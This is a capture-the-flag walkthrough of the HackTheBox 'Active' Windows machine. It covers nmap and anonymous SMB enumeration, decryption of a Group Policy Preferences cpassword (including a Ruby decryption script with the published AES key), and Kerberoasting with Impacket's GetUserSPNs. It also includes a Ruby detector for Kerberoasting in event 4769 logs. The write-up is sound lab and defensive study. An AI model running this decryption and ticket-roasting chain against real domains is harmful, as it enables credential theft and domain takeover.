HackTheBox “Active” Walkthrough
Active is an easy-level Windows machine on HackTheBox. It starts with an anonymously readable SMB share in which a Group Policy Preferences file holds an encrypted service-account password; decrypting it yields working domain credentials, which in turn let us request a service ticket tied to the Administrator account and so obtain the Administrator user's hash. Cracking that hash by brute force gives the Administrator password, authentication as SYSTEM, and free rein over the system.
Let’s get started! 🚀
Recon & Enumeration
Let's use nmap to run a full scan of all TCP ports and detect the services behind them:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -T4 -A -p- 10.10.10.100
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 17:03 EST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.100
Host is up (0.11s latency).
Not shown: 65329 closed tcp ports (reset), 183 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-16 22:27:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msdfsr?
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49171/tcp open unknown
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows 8 (96%), Microsoft Windows 7 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SP0 or SP1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Vista SP2 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-16T22:28:23
|_ start_date: 2024-02-16T21:21:46
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 105.65 ms 10.10.14.1
2 103.78 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1607.76 seconds
Numerous open ports and services were detected, including SMB. The banners identify the OS as Microsoft Windows Server 2008 R2 SP1, and the LDAP service reveals the domain name "active.htb"; together with DNS and Kerberos and the host name DC, this tells us the box is the domain controller. To facilitate access, the domain will be appended to /etc/hosts.
Next, we list the SMB shares anonymously and find a share named "Replication", which we can connect to without credentials.
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //active.htb/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>
After exploring the share, I found "Groups.xml" in the MACHINE\Preferences\Groups directory of the policy shown above. Let's download the file to examine its contents.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 277563 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
┌──(kali㉿kali)-[~/Desktop]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We discovered the username "active.htb\SVC_TGS" and its encrypted password, stored in the "cpassword" attribute. We can decrypt it with "gpp-decrypt", a Ruby script included in Kali Linux by default.
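The decryption gpp-decrypt performs, written out as an added Ruby example rather than code from this write-up or from gpp-decrypt itself: the AES-256 key is the one Microsoft published in its GPP documentation, which is why MS14-025 stopped new cpassword values from being written but left existing SYSVOL files for administrators to find and remove. The find_gpp_credentials helper is an assumed name for an audit sweep over a preferences XML file; the Groups.xml embedded below is the one recovered from the Replication share above.

```ruby
require 'openssl'

# AES-256 key that Microsoft published in the GPP documentation (background to
# MS14-025). Every cpassword in every domain is encrypted under this one fixed
# key, so the attribute gives no confidentiality to anyone who can read SYSVOL.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8' \
               'f496e806cc057990209b09a433b66c1b'].pack('H*')

# Decrypt one cpassword value: restore the base64 padding GPP strips, run
# AES-256-CBC with a zero IV (PKCS#7 padding), then convert the UTF-16LE text.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((-cpassword.length) % 4)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plain = cipher.update(padded.unpack1('m')) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Audit sweep (assumed helper name): report every non-empty cpassword attribute
# in a preferences XML file (Groups.xml, Services.xml, ScheduledTasks.xml, ...)
# together with the account it belongs to. Any hit is a credential that must
# be rotated, and the file must be removed from SYSVOL.
def find_gpp_credentials(xml)
  xml.scan(/<Properties\b[^>]*>/).filter_map do |props|
    cpassword = props[/\bcpassword="([^"]*)"/, 1]
    next if cpassword.nil? || cpassword.empty?
    # the account attribute differs by preference type: userName, runAs, accountName
    user = props[/\b(?:userName|runAs|accountName)="([^"]*)"/, 1]
    { user: user, password: decrypt_cpassword(cpassword) }
  end
end

# Groups.xml exactly as recovered from the Replication share above.
GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
  </Groups>
XML

find_gpp_credentials(GROUPS_XML).each { |c| puts "#{c[:user]} -> #{c[:password]}" }
```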
Using the obtained credentials (SVC_TGS:GPPstillStandingStrong2k18), we'll attempt to access the Users share.
The Impacket collection includes a script named GetUserSPNs.py, which lists the Service Principal Names (SPNs) registered on user accounts in the domain. Running it with the discovered credentials and the -request flag also asks the KDC for a Ticket-Granting Service (TGS) ticket for each SPN; because that ticket is encrypted with the service account's password hash, it can be attacked offline.
┌──(kali㉿kali)-[~/Desktop/impacket/examples]
└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-02-16 16:22:52.552948
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$513817c4ac3cb618e26dcafd5c878e75$[remainder of ticket hash omitted]
We obtained a TGS ticket for the Administrator account's SPN; the next step is to crack it offline and, if that succeeds, escalate privileges. Let's proceed using John the Ripper.
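The defender's view of the same step, as an added Ruby example that is not from this write-up: a Kerberoasting request shows up in the domain controller's Security log as event 4769 with ticket encryption type 0x17 (RC4-HMAC, the "23" in the $krb5tgs$23$ hash above) for a service run by a user account rather than krbtgt or a computer account. The log lines, addresses and helper names are constructed for the example; the field names follow the Windows 4769 event.

```ruby
# Constructed 4769 ("A Kerberos service ticket was requested") records, flattened
# to key=value pairs the way a SIEM often stores them. Field names follow the
# Windows Security log; the values are invented for this example.
SAMPLE_4769 = <<~LOG
  EventID=4769 AccountName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 TicketOptions=0x40810000 ClientAddress=::ffff:10.10.14.5 FailureCode=0x0
  EventID=4769 AccountName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 TicketOptions=0x40810000 ClientAddress=::ffff:10.10.14.5 FailureCode=0x0
  EventID=4769 AccountName=alice@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 TicketOptions=0x40810000 ClientAddress=::ffff:10.10.10.50 FailureCode=0x0
  EventID=4769 AccountName=SVC_TGS@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 TicketOptions=0x40810000 ClientAddress=::ffff:10.10.14.5 FailureCode=0x0
  EventID=4769 AccountName=bob@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 TicketOptions=0x40810000 ClientAddress=::ffff:10.10.10.51 FailureCode=0x1f
LOG

RC4_HMAC = '0x17' # etype 23; AES tickets are 0x11 / 0x12

def parse_4769(line)
  line.split.each_with_object({}) do |pair, ev|
    key, value = pair.split('=', 2)
    ev[key] = value if value
  end
end

# One successful RC4 service-ticket request for a user-account service is the
# Kerberoasting signature: tools such as GetUserSPNs ask for RC4 because a
# $krb5tgs$23$ hash cracks far faster than an AES one. krbtgt and computer
# accounts (names ending in $) are excluded: their long random keys are not
# crackable and they generate most of the legitimate 4769 volume.
def kerberoast_candidate?(ev)
  return false unless ev['EventID'] == '4769' && ev['FailureCode'] == '0x0'
  svc = ev['ServiceName'].to_s
  ev['TicketEncryptionType'] == RC4_HMAC && svc.downcase != 'krbtgt' && !svc.end_with?('$')
end

# Group hits by requesting account and source address and list the service
# accounts whose ticket (and so password hash) was handed out to each.
def kerberoast_report(log)
  log.each_line.map { |line| parse_4769(line.strip) }
     .select { |ev| kerberoast_candidate?(ev) }
     .group_by { |ev| [ev['AccountName'], ev['ClientAddress']] }
     .transform_values { |evs| evs.map { |ev| ev['ServiceName'] }.uniq.sort }
end

kerberoast_report(SAMPLE_4769).each do |(account, source), services|
  puts "#{account} from #{source} requested RC4 tickets for: #{services.join(', ')}"
end
```

Several distinct user-account services requested by one principal from one address in a short window, as in the sample, is the pattern worth alerting on; a single hit for a service the requester normally uses may be legitimate RC4 fallback.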
To log in as Administrator, we'll use Impacket's psexec.py.
Cheers.